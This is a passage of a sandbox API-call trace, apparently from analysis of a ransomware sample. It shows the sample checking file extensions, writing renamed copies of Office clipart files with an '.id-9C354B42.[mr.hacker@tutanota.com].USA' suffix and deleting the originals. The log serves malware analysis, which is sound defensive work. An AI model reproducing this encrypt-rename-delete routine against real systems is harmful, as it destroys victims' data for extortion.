(lpString1=".dbf", lpString2=".WMF") returned -1 [0054.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0054.335] lstrlenW (lpString=".1cd") returned 4 [0054.335] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63 [0054.335] lstrlenW (lpString=".jpg") returned 4 [0054.335] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.335] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.335] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.335] GetLastError () returned 0x0 [0054.335] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0xc9c, lpOverlapped=0x0) returned 1 [0054.337] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xca0, lpOverlapped=0x0) returned 1 [0054.338] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.338] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.338] SetEndOfFile (hFile=0x230) returned 1 [0054.338] CloseHandle (hObject=0x230) returned 1 [0054.338] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.338] SetEndOfFile (hFile=0x22c) returned 1 [0054.339] CloseHandle (hObject=0x22c) returned 1 [0054.339] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.339] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0054.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0054.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0054.339] lstrlenW (lpString=".doc") returned 4 [0054.339] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.339] lstrlenW (lpString=".docx") returned 5 [0054.339] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.339] lstrlenW (lpString=".pdf") returned 4 [0054.339] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.339] lstrlenW (lpString=".xls") returned 4 [0054.339] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.339] lstrlenW (lpString=".xlsx") returned 5 [0054.339] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.340] lstrlenW (lpString=".ppt") returned 4 [0054.340] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0054.340] lstrlenW (lpString=".zip") returned 4 [0054.340] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.340] lstrlenW (lpString=".rar") returned 4 [0054.340] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.340] lstrlenW (lpString=".bz2") returned 4 [0054.340] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.340] lstrlenW (lpString=".7z") returned 3 [0054.340] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0054.340] lstrlenW (lpString=".dbf") returned 4 [0054.340] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0054.340] lstrlenW (lpString=".1cd") returned 4 [0054.340] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 63 [0054.340] lstrlenW (lpString=".jpg") returned 4 [0054.340] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.340] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.340] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0054.341] GetLastError () returned 0x0 [0054.341] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x12c8, lpOverlapped=0x0) returned 1 [0054.712] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x12d0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x12d0, lpOverlapped=0x0) returned 1 [0054.713] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.713] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.713] SetEndOfFile (hFile=0x230) returned 1 [0055.104] CloseHandle (hObject=0x230) returned 1 [0055.104] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0055.104] SetEndOfFile (hFile=0x22c) returned 1 [0055.105] CloseHandle (hObject=0x22c) returned 1 [0055.105] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0055.105] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0055.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0055.894] lstrlenW (lpString=".doc") returned 4 [0055.894] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.894] lstrlenW (lpString=".docx") returned 5 [0055.894] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.894] lstrlenW (lpString=".pdf") returned 4 [0055.894] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.894] lstrlenW (lpString=".xls") returned 4 [0055.894] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.894] lstrlenW (lpString=".xlsx") returned 5 [0055.894] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.894] lstrlenW (lpString=".ppt") returned 4 [0055.894] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0055.894] lstrlenW (lpString=".zip") returned 4 [0055.894] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.894] lstrlenW (lpString=".rar") returned 4 [0055.894] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.894] lstrlenW (lpString=".bz2") returned 4 [0055.894] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.894] lstrlenW (lpString=".7z") returned 3 [0055.894] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0055.895] lstrlenW (lpString=".dbf") returned 4 [0055.895] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0055.895] lstrlenW (lpString=".1cd") returned 4 [0055.895] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.895] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 63 [0055.895] lstrlenW (lpString=".jpg") returned 4 [0055.895] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.399] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.399] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.416] GetLastError () returned 0x0 [0056.416] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x133c, lpOverlapped=0x0) returned 1 [0056.426] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1340, lpOverlapped=0x0) returned 1 [0056.427] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.427] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.427] SetEndOfFile (hFile=0x230) returned 1 [0056.427] CloseHandle (hObject=0x230) returned 1 [0056.427] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.427] SetEndOfFile (hFile=0x204) returned 1 [0056.428] CloseHandle (hObject=0x204) returned 1 [0056.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.428] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0056.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0056.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0056.428] lstrlenW (lpString=".doc") returned 4 [0056.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.428] lstrlenW (lpString=".docx") returned 5 [0056.428] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.428] lstrlenW (lpString=".pdf") returned 4 [0056.429] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.429] lstrlenW (lpString=".xls") returned 4 [0056.429] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.429] lstrlenW (lpString=".xlsx") returned 5 [0056.429] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.429] lstrlenW (lpString=".ppt") returned 4 [0056.429] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0056.429] lstrlenW (lpString=".zip") returned 4 [0056.429] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.429] lstrlenW (lpString=".rar") returned 4 [0056.429] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.429] lstrlenW (lpString=".bz2") returned 4 [0056.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.429] lstrlenW (lpString=".7z") returned 3 [0056.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0056.429] lstrlenW (lpString=".dbf") returned 4 [0056.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0056.429] lstrlenW (lpString=".1cd") returned 4 [0056.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 63 [0056.429] lstrlenW (lpString=".jpg") returned 4 [0056.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.430] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=13515) returned 1 [0056.430] CloseHandle (hObject=0x204) returned 1 [0056.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 0x20 [0056.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.430] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.430] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.431] GetLastError () returned 0x0 [0056.431] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x34cb, lpOverlapped=0x0) returned 1 [0056.432] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x34d0, lpOverlapped=0x0) returned 1 [0056.433] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.433] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.433] SetEndOfFile (hFile=0x230) returned 1 [0056.433] CloseHandle (hObject=0x230) returned 1 [0056.434] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.434] SetEndOfFile (hFile=0x204) returned 1 [0056.434] CloseHandle (hObject=0x204) returned 1 [0056.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.435] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0056.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.435] lstrlenW (lpString=".doc") returned 4 [0056.435] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.435] lstrlenW (lpString=".docx") returned 5 [0056.435] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.435] lstrlenW (lpString=".pdf") returned 4 [0056.435] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.435] lstrlenW (lpString=".xls") returned 4 [0056.435] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.435] lstrlenW (lpString=".xlsx") returned 5 [0056.435] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.435] lstrlenW (lpString=".ppt") returned 4 [0056.435] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.435] lstrlenW (lpString=".zip") returned 4 [0056.435] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.435] lstrlenW (lpString=".rar") returned 4 [0056.435] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.435] lstrlenW (lpString=".bz2") returned 4 [0056.435] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.435] lstrlenW (lpString=".7z") returned 3 [0056.436] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.436] lstrlenW (lpString=".dbf") returned 4 [0056.436] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.436] lstrlenW (lpString=".1cd") returned 4 [0056.436] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0056.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 63 [0056.436] lstrlenW (lpString=".jpg") returned 4 [0056.436] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.437] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=20189) returned 1 [0056.437] CloseHandle (hObject=0x204) returned 1 [0056.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 0x20 [0056.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.437] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.437] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.437] GetLastError () returned 0x0 [0056.437] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x4edd, lpOverlapped=0x0) returned 1 [0056.439] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x4ee0, lpOverlapped=0x0) returned 1 [0056.441] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.441] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.441] SetEndOfFile (hFile=0x230) returned 1 [0056.441] CloseHandle (hObject=0x230) returned 1 [0056.441] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.441] SetEndOfFile (hFile=0x204) returned 1 [0056.442] CloseHandle (hObject=0x204) returned 1 [0056.442] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.442] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0056.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0056.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0056.442] lstrlenW (lpString=".doc") returned 4 [0056.443] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.443] lstrlenW (lpString=".docx") returned 5 [0056.443] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.443] lstrlenW (lpString=".pdf") returned 4 [0056.443] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.443] lstrlenW (lpString=".xls") returned 4 [0056.443] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.443] lstrlenW (lpString=".xlsx") returned 5 [0056.443] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.443] lstrlenW (lpString=".ppt") returned 4 [0056.443] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0056.443] lstrlenW (lpString=".zip") returned 4 [0056.443] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.443] lstrlenW (lpString=".rar") returned 4 [0056.443] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.443] lstrlenW (lpString=".bz2") returned 4 [0056.443] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.443] lstrlenW (lpString=".7z") returned 3 [0056.443] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0056.443] lstrlenW (lpString=".dbf") returned 4 [0056.443] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0056.443] lstrlenW (lpString=".1cd") 